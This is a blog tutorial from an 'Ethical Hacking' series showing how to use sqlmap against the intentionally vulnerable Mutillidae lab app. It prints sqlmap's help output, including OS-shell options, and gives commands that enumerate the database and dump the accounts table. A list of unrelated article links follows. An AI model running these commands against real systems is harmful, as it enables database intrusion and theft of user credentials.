• Ethical Hacking


    SQL INJECTION

    SQLMAP

    • Tool designed to exploit SQL injections.
    • Works with many DB types, MySQL, MSSQL ...etc.
    >sqlmap --help
    >sqlmap -u [target URL]

    Following are examples:

    sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details"

     

     You can find more functions>

    root@kali:~# sqlmap --help
            ___
           __H__
     ___ ___[']_____ ___ ___  {1.4#stable}
    |_ -| . [,]     | .'| . |
    |___|_  [.]_|_|_|__,|  _|
          |_|V...       |_|   http://sqlmap.org
    
    Usage: python3 sqlmap [options]
    
    Options:
      -h, --help            Show basic help message and exit
      -hh                   Show advanced help message and exit
      --version             Show program's version number and exit
      -v VERBOSE            Verbosity level: 0-6 (default 1)
    
      Target:
        At least one of these options has to be provided to define the
        target(s)
    
        -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
        -g GOOGLEDORK       Process Google dork results as target URLs
    
      Request:
        These options can be used to specify how to connect to the target URL
    
        --data=DATA         Data string to be sent through POST (e.g. "id=1")
        --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
        --random-agent      Use randomly selected HTTP User-Agent header value
        --proxy=PROXY       Use a proxy to connect to the target URL
        --tor               Use Tor anonymity network
        --check-tor         Check to see if Tor is used properly
    
      Injection:
        These options can be used to specify which parameters to test for,
        provide custom injection payloads and optional tampering scripts
    
        -p TESTPARAMETER    Testable parameter(s)
        --dbms=DBMS         Force back-end DBMS to provided value
    
      Detection:
        These options can be used to customize the detection phase
    
        --level=LEVEL       Level of tests to perform (1-5, default 1)
        --risk=RISK         Risk of tests to perform (1-3, default 1)
    
      Techniques:
        These options can be used to tweak testing of specific SQL injection
        techniques
    
        --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")
    
      Enumeration:
        These options can be used to enumerate the back-end database
        management system information, structure and data contained in the
        tables
    
        -a, --all           Retrieve everything
        -b, --banner        Retrieve DBMS banner
        --current-user      Retrieve DBMS current user
        --current-db        Retrieve DBMS current database
        --passwords         Enumerate DBMS users password hashes
        --tables            Enumerate DBMS database tables
        --columns           Enumerate DBMS database table columns
        --schema            Enumerate DBMS schema
        --dump              Dump DBMS database table entries
        --dump-all          Dump all DBMS databases tables entries
        -D DB               DBMS database to enumerate
        -T TBL              DBMS database table(s) to enumerate
        -C COL              DBMS database table column(s) to enumerate
    
      Operating system access:
        These options can be used to access the back-end database management
        system underlying operating system
    
        --os-shell          Prompt for an interactive operating system shell
        --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    
      General:
        These options can be used to set some general working parameters
    
        --batch             Never ask for user input, use the default behavior
        --flush-session     Flush session files for current target
    
      Miscellaneous:
        These options do not fit into any other category
    
        --sqlmap-shell      Prompt for an interactive sqlmap shell
        --wizard            Simple wizard interface for beginner users

    Let try some of the common functions.

    sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --dbs

    sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --current-user

    sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --current-db

    sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

    sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --columns -T accounts -D owasp10

    sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    055——VUE中vue-router之路由参数的随意设置与伪静态链接地址处理:
    将PCM格式存储成WAV格式文件
    pcm、wav、amr说明
    使用ffmpeg.exe进行转码参数说明
    使用Java调用exe可执行文件
    函数和宏实现打印的增强myprintf
    va_start和va_end使用详解
    为何windows自带的文件搜索这么慢,而Everything的这么快
    clearfix清除浮动
    DISCUZ! X2.5设置仅允许QQ登录注册论坛 加固会员注册机制
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/12288700.html
Copyright © 2020-2023  润新知